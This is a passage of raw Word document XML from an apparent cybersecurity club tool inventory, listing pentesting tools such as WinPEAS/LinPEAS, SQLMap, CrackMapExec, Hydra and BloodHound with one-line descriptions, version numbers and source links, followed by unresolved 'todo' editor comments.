      <w:hyperlink r:id="R874a8fc0411042a5">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/dirbuster</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001B1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B2" w14:textId="218F9F0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>WinPEAS</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001B3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5D0327B3">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Privilege escalation scripts to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> misconfigurations to obtain higher permissions in Windows and Linux systems respectively </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Version Number: 20231126-a1ab960a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="R49a941cabe874458">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/carlospolop/PEASS-ng/releases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001B7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B8" w14:textId="7CD95370">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001B9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="14C1DA87">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001BA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Automated tool used to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> exploit SQL Injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001BB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 1.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001BC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="R4e2ad7d6096344e5">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap/releases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001BD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001BE" w14:textId="052C6DDC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001BF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="2DD8A316">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Versatile executable used for </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>pentesting</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> Windows and Active Directory environments </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 5.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Rebc550bf3cb246e5">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/crackmapexec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001C3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C4" w14:textId="2F8C04B8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001C5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="1473EF43">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> Password </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>bruteforcer</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> utilized for cracking login for multiple protocols including HTTP, FTP, SSH, and more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 8.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001C8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Rfde910a4810d4b39">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001C9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001CA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.zbd1ahlbjh41" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001CB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5FC96A4F">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001CC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> Active Directory enumeration tool used to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> misconfigurations in AD environments using a graph-based visualization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001CD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 4.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001CE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R7a6130571bdc436a">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/BloodHoundAD</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001CF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00027506">
      <w:headerReference w:type="even" r:id="rId27"/>
      <w:headerReference w:type="default" r:id="rId28"/>
      <w:footerReference w:type="even" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>
      <w:headerReference w:type="first" r:id="rId31"/>
      <w:footerReference w:type="first" r:id="rId32"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType w:start="1"/>
      <w:cols w:space="720"/>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nitials="" w:author="UMass Cybersecurity Club" w:date="2024-10-23T16:29:00Z" w:id="2">
    <w:p w:rsidR="00027506" w:rsidRDefault="0085413F" w14:paraId="000001DC" w14:textId="77777777">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>todo add email phone number</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AT" w:author="Alexander Tong" w:date="2024-10-23T12:47:00Z" w:id="10">
    <w:p w:rsidR="00E22175" w:rsidRDefault="00E22175" w14:paraId="5FB2ED0D" w14:textId="4051862C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="24613E62">
        <w:t>fill this out</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AT" w:author="Alexander Tong" w:date="2024-10-23T12:47:00Z" w:id="13">
    <w:p w:rsidR="00E22175" w:rsidRDefault="00E22175" w14:paraId="3D896629" w14:textId="585673FE">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="72E44E35">
        <w:t>insert image here</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AT" w:author="Alexander Tong" w:date="2024-10-23T12:47:00Z" w:id="15">
    <w:p w:rsidR="00E22175" w:rsidRDefault="00E22175" w14:paraId="513798FE" w14:textId="5F6A792F">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="2409C84D">
        <w:t>todo fill this in</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AT" w:author="Alexander Tong" w:date="2024-10-23T12:46:00Z" w:id="17">
    <w:p w:rsidR="00E22175" w:rsidRDefault="00E22175" w14:paraId="484543B5" w14:textId="5244F3FD">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="22D3DB85">
        <w:t>todo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AT" w:author="Alexander Tong" w:date="2024-10-23T12:58:00Z" w:id="19">
    <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="0859578E" w14:textId="57F84AC2">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="204531D6">
        <w:t>todo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:initials="GU" w:author="Guest User" w:date="2024-10-24T08:53:25" w:id="944092629">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="40CFACCB" w:rsidRDefault="52ED504D" w14:paraId="048D816F" w14:textId="473BE8B0">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="1DB3EB8E" w:rsidR="32103541">
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:initials="GU" w:author="Guest User" w:date="2024-10-24T08:54:52" w:id="2088395850">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="0A116DE4" w:rsidRDefault="20843C7A" w14:paraId="69231E7A" w14:textId="1EB33912">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="7A4A2E67" w:rsidR="4DD43D8F">
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:initials="GU" w:author="Guest User" w:date="2024-10-24T08:54:57" w:id="1115039105">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="02187D92" w:rsidRDefault="49A72667" w14:paraId="34038831" w14:textId="2B330BA9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="5B1AAB6C" w:rsidR="5DC833CB">
        <w:t>TODO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:initials="GU" w:author="Guest User" w:date="2024-10-24T08:55:32" w:id="662623206">
    <w:p xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:rsidR="7A8AAAE9" w:rsidRDefault="261DCC84" w14:paraId="48E215E0" w14:textId="1562F3B6">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidRPr="526021FF" w:rsidR="78354F95">
        <w:t>todo</w:t>
      </w:r>
    </w:p>
  </w:comment>
</w:comments>
</file>

<file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
<w15:commentsEx xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w15">
  <w15:commentEx w15:done="0" w15:paraId="000001DC"/>
  <w15:commentEx w15:done="0" w15:paraId="5FB2ED0D"/>
  <w15:commentEx w15:done="0" w15:paraId="3D896629"/>
  <w15:commentEx w15:done="0" w15:paraId="513798FE"/>
  <w15:commentEx w15:done="0" w15:paraId="484543B5"/>
  <w15:commentEx w15:done="0" w15:paraId="0859578E"/>
  <w15:commentEx w15:done="0" w15:paraId="048D816F"/>
  <w15:commentEx w15:done="0" w15:paraId="69231E7A"/>
  <w15:commentEx w15:done="0" w15:paraId="34038831"/>
  <w15:commentEx w15:done="0" w15:paraId="48E215E0"/>
</w15:commentsEx>
</file>

<file path=word/commentsExtensible.xml><?xml version="1.0" encoding="utf-8"?>
<w16cex:commentsExtensible xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w16 w16cex">
  <w16cex:commentExtensible w16cex:durableId="05C668EC" w16cex:dateUtc="2024-10-23T16:47:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="731DBF4F" w16cex:dateUtc="2024-10-23T16:47:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="5CCAB261" w16cex:dateUtc="2024-10-23T16:47:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="6140796D" w16cex:dateUtc="2024-10-23T16:46:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="36829162" w16cex:dateUtc="2024-10-23T16:58:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="6274A916" w16cex:dateUtc="2024-10-24T13:53:25.586Z"/>
  <w16cex:commentExtensible w16cex:durableId="38991B8D" w16cex:dateUtc="2024-10-24T13:54:52.226Z"/>
  <w16cex:commentExtensible w16cex:durableId="35B862D6" w16cex:dateUtc="2024-10-24T13:54:57.85Z"/>
  <w16cex:commentExtensible w16cex:durableId="238E9D98" w16cex:dateUtc="2024-10-24T13:55:32.141Z"/>
</w16cex:commentsExtensible>
</file>

<file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
<w16cid:commentsIds xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" mc:Ignorable="w16cid">
  <w16cid:commentId w16cid:paraId="000001DC" w16cid:durableId="000001DC"/>
  <w16cid:commentId w16cid:paraId="5FB2ED0D" w16cid:durableId="05C668EC"/>
  <w16cid:commentId w16cid:paraId="3D896629" w16cid:durableId="731DBF4F"/>
  <w16cid:commentId w16cid:paraId="513798FE" w16cid:durableId="5CCAB261"/>
  <w16cid:commentId w16cid:paraId="484543B5" w16cid:durableId="6140796D"/>
  <w16cid:commentId w16cid:paraId="0859578E" w16cid:durableId="36829162"/>
  <w16cid:commentId w16cid:paraId="048D816F" w16cid:durableId="6274A916"/>
